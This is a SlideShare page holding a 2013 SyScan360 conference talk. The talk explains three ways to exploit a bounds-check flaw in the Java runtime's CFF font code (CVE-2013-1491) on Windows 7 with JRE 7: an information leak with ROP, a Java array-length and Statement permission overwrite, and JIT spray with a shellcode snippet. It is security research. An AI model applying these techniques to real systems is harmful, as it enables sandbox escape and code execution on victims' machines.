Exploit Your Java Native
Vulnerabilities on Win7/JRE7 in One
Minute
Or how to exploit a single java vulnerability
in three...
Today we are not talking about how to
find 0day java native vulnerabilities, but
how to “cook” them
About me
• Architect, Trend Micro China
Development Center
• Interested in vulnerabilities,
sandbox technique, anti-APT
so...
Agenda
• Background
• The vulnerability
• Exploit method 1
• Exploit method 2
• Exploit method 3
• Conclusion
What is java native vulnerability?
• Vulnerability which exists in JRE native code
(C/C++ code)
– Stack overflow
– Heap ov...
Trends of Java native vulnerability
Exploit Java native vulnerability
• JRE 6
– No DEP, ASLR
– Find a schoolchild and teach him Heap Spray
• JRE 7
– Opt-in DE...
Agenda
• Background
• The vulnerability
• Exploit method 1
• Exploit method 2
• Exploit method 3
• Conclusion
CVE-2013-1491
• Found by Joshua J. Drake (jduck)
• Used on Pwn2013, defeated JRE 7 +
Windows8 (Accuvant Lab's White Paper)...
CFF Font Instructions
• Compact Font Format, or Type2 font
• You can write instructions (byte codes) to help
building a ch...
Related Data Structures
• TopDictInfo
– buildCharArray – dynamic allocated array
– reg_WeightVector – static array in the ...
The two vulnerable instructions
• store [0, j, index, count]
• load [0, index, count]
No array boundary checks on store/lo...
What can we do with it
• Read/Write arbitrary 16-bit range in the
buildCharArray and regWeightVector
• By over writing the...
Example
Initial State
T->topDictData
…
buildCharArray
…
reg_WeightVector
0x2000000
0x200087c
0x20007b4
0x2100000
Step1
put(0, 0x0c0c0c0c)
T->topDictData
…
buildCharArray
…
reg_WeightVector
0x2000000
0x200087c
0x20007b4
0x2100000
0c0c0c...
Step2
store(0, -18, 0, 1)
T->topDictData
…
buildCharArray
…
reg_WeightVector
0x2000000
0x200087c
0x20007b4 0x2100000
0c0c0...
Step3
put(0, 0x41414141)
T->topDictData
…
buildCharArray
…
reg_WeightVector
0x2000000
0x200087c
0x20007b4
0x0c0c0c0c
41414...
Agenda
• Background
• The vulnerability
• Exploit method 1
• Exploit method 2
• Exploit method 3
• Conclusion
Information Leak + ROP
Information Leak
• Read a function pointer from the structure
• Sub a pre-computed offset from the function
pointer addres...
ROP
1. Write ROP gadgets into buildCharArray
2. Set jmp_buf->eip to the first ROP instruction
3. Set jmp_buf->esp to build...
Agenda
• Background
• The vulnerability
• Exploit method 1
• Exploit method 2
• Exploit method 3
• Conclusion
Overwrite Array Length +
Statement
Java Array in memory
Object
Head length a[0] a[1] … a[n]
8 bytes 4 bytes
If we can overwrite the length field, then we can...
Array Spray
Overwrite Array length
• Set buildCharArray to 0x23ad27d8 (this address may
vary in different OS)
• Write “0x7fffffff” to ...
Overwrite ACC in Statement Object
• Statement: call method on a target object
• AccessControlContext: check permission on
...
Overwrite ACC in Statement Object
• When a new statement is created, the acc is set to
the “snapshot” of current calling c...
Method 2 – Exploit Procedure
length
data
1. Allocate arrays
acc
statement2. Allocate statement
object right after the arra...
Demo
• Exploit CVE-2013-1491 using Array length
overwriting + Statement
Method2 - Limitation
• You need to be able to overwrite memory of
Java Object Heap
JVM
java object heapjava native heap
Ja...
Agenda
• Background
• The vulnerability
• Exploit method 1
• Exploit method 2
• Exploit method 3
• Conclusion
JIT Spray
History of JIT Spray
• Dion Blazakis - interpreter exploitation:
pointer inference and spraying
• Alexey Sintsov- Writing ...
History of JIT Spray
• Mostly focus on flash
• No practical POC & Guide on Java
Java JIT Compiler
Java compiler,
into byte code in class file
JIT compiler, into native code
Java JIT Compiler (.cont)
• View JIT generated code
– -XX:+UnlockDiagnosticVMOptions -
XX:+PrintAssembly
• CompileThreshol...
XOR in java JIT compiler
public int spray(int a) {
int b = a;
b ^= 0x90909090;
b ^= 0x90909090;
b ^= 0x90909090;
return b;...
XOR in java JIT compiler (.cont)
• The XOR statement is compiled to an instruction of
six bytes
– 81 F2 90 90 90 3C xor ed...
Set EIP in the middle
$0: 81 F2 90 90 90 3C : xor edx, 0x3C909090
$6: 81 F2 90 90 90 3C : xor edx, 0x3C909090
$12: 81 F2 9...
Find a reliable EIP to jump to
• 0x02cd70b7
– Fairly reliable on the tested systems:
– windows xp sp3, windows 7 home edit...
Spray multiple functions at runtime
• ClassLoader.loadClass
JIT00002.classJIT00001.class …
Exploit.class
Performance
• First version: 20 ~ 40s to spray 2400 functions
– Because we have to call a function 1500 times
before it ca...
Shellcode
• Two-Staged
– Stage0: Sprayed by JIT functions, will search for
Stage1 shellcode and execute it (egg-hunt)
– St...
Demo
• Exploit CVE-2013-1491 using JIT Spray
Add JIT Spray to your POC in one
minute
• Demo
– Add JIT Spray to CVE-2013-0809 POC
– We will public all related code afte...
Optional Demo
• JRE 7 native 0day + Win8 + Java JIT Spray
Java JIT Spray - Limitation
• Currently only works on 32bits platform
• You need to be able to control EIP precisely
Agenda
• Background
• The vulnerability
• Exploit method 1
• Exploit method 2
• Exploit method 3
• Conclusion
Conclusion
• We introduced 3 different methods to exploit
a java native vulnerability and bypass
DEP/ASLR
• You need to ch...
Conclusion
• Choose JIT Spray if 32bits & you can control
the EIP
• Choose Array + Statement if you can overwrite
a java a...
"Heapsprays are for the 99%"
“And so are JIT sprays."
Thank you!
Q & A
2013 syscan360 yuki_chen_syscan360_exploit your java native vulnerabilities on win7jre7 in one minute
2013 syscan360 yuki_chen_syscan360_exploit your java native vulnerabilities on win7jre7 in one minute
Upcoming SlideShare
Loading in …5
×

2013 syscan360 yuki_chen_syscan360_exploit your java native vulnerabilities on win7jre7 in one minute

1,693
-1

Published on

Slides on how to exploit java memory corruption vulnerabilities at syscan360.
Twitter: @guhe120

Published in: Technology, Education
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,693
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
39
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

2013 syscan360 yuki_chen_syscan360_exploit your java native vulnerabilities on win7jre7 in one minute

  1. 1. Exploit Your Java Native Vulnerabilities on Win7/JRE7 in One Minute Or how to exploit a single java vulnerability in three different ways
  2. 2. Today we are not talking about how to find 0day java native vulnerabilities, but how to “cook” them
  3. 3. About me • Architect, Trend Micro China Development Center • Interested in vulnerabilities, sandbox technique, anti-APT solution • Hardcore ACG otaku
  4. 4. Agenda • Background • The vulnerability • Exploit method 1 • Exploit method 2 • Exploit method 3 • Conclusion
  5. 5. What is java native vulnerability? • Vulnerability which exists in JRE native code (C/C++ code) – Stack overflow – Heap overflow – Buffer overflow/underflow – … • Aka, java memory corruption vulnerability
  6. 6. Trends of Java native vulnerability
  7. 7. Exploit Java native vulnerability • JRE 6 – No DEP, ASLR – Find a schoolchild and teach him Heap Spray • JRE 7 – Opt-in DEP, ASLR, windows 7, windows 8 … – Hmmm, seems much harder ? – Actually not so hard, we will show you how to in this presentation
  8. 8. Agenda • Background • The vulnerability • Exploit method 1 • Exploit method 2 • Exploit method 3 • Conclusion
  9. 9. CVE-2013-1491 • Found by Joshua J. Drake (jduck) • Used on Pwn2013, defeated JRE 7 + Windows8 (Accuvant Lab's White Paper) • We also discovered the same issue in Feb 2013, via our java font fuzzer, and finished the exploits in April 2013
  10. 10. CFF Font Instructions • Compact Font Format, or Type2 font • You can write instructions (byte codes) to help building a character at runtime private static native long 0A: call sub routine 0B: return from sub routine 0C 0A: add 0C 0B: sub 0C 0C: div 0C 0D: load stack
  11. 11. Related Data Structures • TopDictInfo – buildCharArray – dynamic allocated array – reg_WeightVector – static array in the structure
  12. 12. The two vulnerable instructions • store [0, j, index, count] • load [0, index, count] No array boundary checks on store/load !
  13. 13. What can we do with it • Read/Write arbitrary 16-bit range in the buildCharArray and regWeightVector • By over writing the buildCharArray pointer, we can achieve arbitrary address read/write
  14. 14. Example Initial State T->topDictData … buildCharArray … reg_WeightVector 0x2000000 0x200087c 0x20007b4 0x2100000
  15. 15. Step1 put(0, 0x0c0c0c0c) T->topDictData … buildCharArray … reg_WeightVector 0x2000000 0x200087c 0x20007b4 0x2100000 0c0c0c0c buildCharArray[0] = 0x0c0c0c0c;
  16. 16. Step2 store(0, -18, 0, 1) T->topDictData … buildCharArray … reg_WeightVector 0x2000000 0x200087c 0x20007b4 0x2100000 0c0c0c0c reg_WeightVector[-18] = buildCharArray[0];
  17. 17. Step3 put(0, 0x41414141) T->topDictData … buildCharArray … reg_WeightVector 0x2000000 0x200087c 0x20007b4 0x0c0c0c0c 41414141 buildCharArray[0] = 0x41414141;
  18. 18. Agenda • Background • The vulnerability • Exploit method 1 • Exploit method 2 • Exploit method 3 • Conclusion
  19. 19. Information Leak + ROP
  20. 20. Information Leak • Read a function pointer from the structure • Sub a pre-computed offset from the function pointer address, to get base address of t2k.dll • Get other dll base (e.g. msvcrt) from IAT of t2k.dll
  21. 21. ROP 1. Write ROP gadgets into buildCharArray 2. Set jmp_buf->eip to the first ROP instruction 3. Set jmp_buf->esp to buildCharArray 4. Trig an internal error to call longjmp struct TopDictInfo { tsiMemObject *mem; … } struct tsiMemObject { … jmp_buf env; … } … esp … … eip
  22. 22. Agenda • Background • The vulnerability • Exploit method 1 • Exploit method 2 • Exploit method 3 • Conclusion
  23. 23. Overwrite Array Length + Statement
  24. 24. Java Array in memory Object Head length a[0] a[1] … a[n] 8 bytes 4 bytes If we can overwrite the length field, then we can read/write out of the bound of this java array
  25. 25. Array Spray
  26. 26. Overwrite Array length • Set buildCharArray to 0x23ad27d8 (this address may vary in different OS) • Write “0x7fffffff” to 0x23ad27d8, which will be the new array length
  27. 27. Overwrite ACC in Statement Object • Statement: call method on a target object • AccessControlContext: check permission on privileged operations
  28. 28. Overwrite ACC in Statement Object • When a new statement is created, the acc is set to the “snapshot” of current calling context • If you created the statement in low privileged code, the acc will be a low privileged ACC • We can replace the acc with a powerful ACC in memory Object Head acc target … …… Statement Object memory layout Powerful ACC
  29. 29. Method 2 – Exploit Procedure length data 1. Allocate arrays acc statement2. Allocate statement object right after the array Memory Space 3. Overwrite array length new length 4. Overwrite acc in statement powerful acc
  30. 30. Demo • Exploit CVE-2013-1491 using Array length overwriting + Statement
  31. 31. Method2 - Limitation • You need to be able to overwrite memory of Java Object Heap JVM java object heapjava native heap Java object Java Array Default heap of JRE native code
  32. 32. Agenda • Background • The vulnerability • Exploit method 1 • Exploit method 2 • Exploit method 3 • Conclusion
  33. 33. JIT Spray
  34. 34. History of JIT Spray • Dion Blazakis - interpreter exploitation: pointer inference and spraying • Alexey Sintsov- Writing JIT shellcode for fun and profit • TT Tsai - The Flash JIT Spraying is Back
  35. 35. History of JIT Spray • Mostly focus on flash • No practical POC & Guide on Java
  36. 36. Java JIT Compiler Java compiler, into byte code in class file JIT compiler, into native code
  37. 37. Java JIT Compiler (.cont) • View JIT generated code – -XX:+UnlockDiagnosticVMOptions - XX:+PrintAssembly • CompileThreshold – Only when a function is called > CompileThreshold times, it will be JITed – Default value: 1500 for client JVM
  38. 38. XOR in java JIT compiler public int spray(int a) { int b = a; b ^= 0x90909090; b ^= 0x90909090; b ^= 0x90909090; return b; } 0x01c21507: cmp 0x4(%ecx),%eax 0x01c2150a: jne 0x01bbd100 ; 0x01c21510: mov %eax,0xffffc000(%esp) 0x01c21517: push %ebp 0x01c21518: sub $0x18,%esp 0x01c2151b: xor $0x90909090,%edx 0x01c21521: xor $0x90909090,%edx 0x01c21527: xor $0x90909090,%edx … 0x01c21539: ret
  39. 39. XOR in java JIT compiler (.cont) • The XOR statement is compiled to an instruction of six bytes – 81 F2 90 90 90 3C xor edx, 0x3C909090 • We can replace the 3 NOP bytes with our shellcode
  40. 40. Set EIP in the middle $0: 81 F2 90 90 90 3C : xor edx, 0x3C909090 $6: 81 F2 90 90 90 3C : xor edx, 0x3C909090 $12: 81 F2 90 90 90 3C : xor edx, 0x3C909090 $0: 81 F2 $2: 90 nop $3: 90 nop $4: 90 nop $5: 3C 81 cmp al, 81 $7: F2 repne $8: 90 nop $9: 90 nop $10: 90 nop $11: 3C 81 cmp al, 81 EIP EIP
  41. 41. Find a reliable EIP to jump to • 0x02cd70b7 – Fairly reliable on the tested systems: – windows xp sp3, windows 7 home edition, windows 7 enterprise edition, windows 8 home edition
  42. 42. Spray multiple functions at runtime • ClassLoader.loadClass JIT00002.classJIT00001.class … Exploit.class
  43. 43. Performance • First version: 20 ~ 40s to spray 2400 functions – Because we have to call a function 1500 times before it can be JITed • Use pre warm up: 7 ~ 9s
  44. 44. Shellcode • Two-Staged – Stage0: Sprayed by JIT functions, will search for Stage1 shellcode and execute it (egg-hunt) – Stage1: Defined in java string, do the real work
  45. 45. Demo • Exploit CVE-2013-1491 using JIT Spray
  46. 46. Add JIT Spray to your POC in one minute • Demo – Add JIT Spray to CVE-2013-0809 POC – We will public all related code after the presentation
  47. 47. Optional Demo • JRE 7 native 0day + Win8 + Java JIT Spray
  48. 48. Java JIT Spray - Limitation • Currently only works on 32bits platform • You need to be able to control EIP precisely
  49. 49. Agenda • Background • The vulnerability • Exploit method 1 • Exploit method 2 • Exploit method 3 • Conclusion
  50. 50. Conclusion • We introduced 3 different methods to exploit a java native vulnerability and bypass DEP/ASLR • You need to choose the one that fit your vulnerability
  51. 51. Conclusion • Choose JIT Spray if 32bits & you can control the EIP • Choose Array + Statement if you can overwrite a java array on java object heap • Choose Information Leak + ROP if you are Vupen
  52. 52. "Heapsprays are for the 99%" “And so are JIT sprays."
  53. 53. Thank you! Q & A
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×